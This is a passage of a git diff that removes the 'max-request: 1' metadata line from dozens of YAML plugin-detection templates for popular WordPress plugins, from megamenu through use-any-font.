     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 41baa25eb7..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index ee389af6ec..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
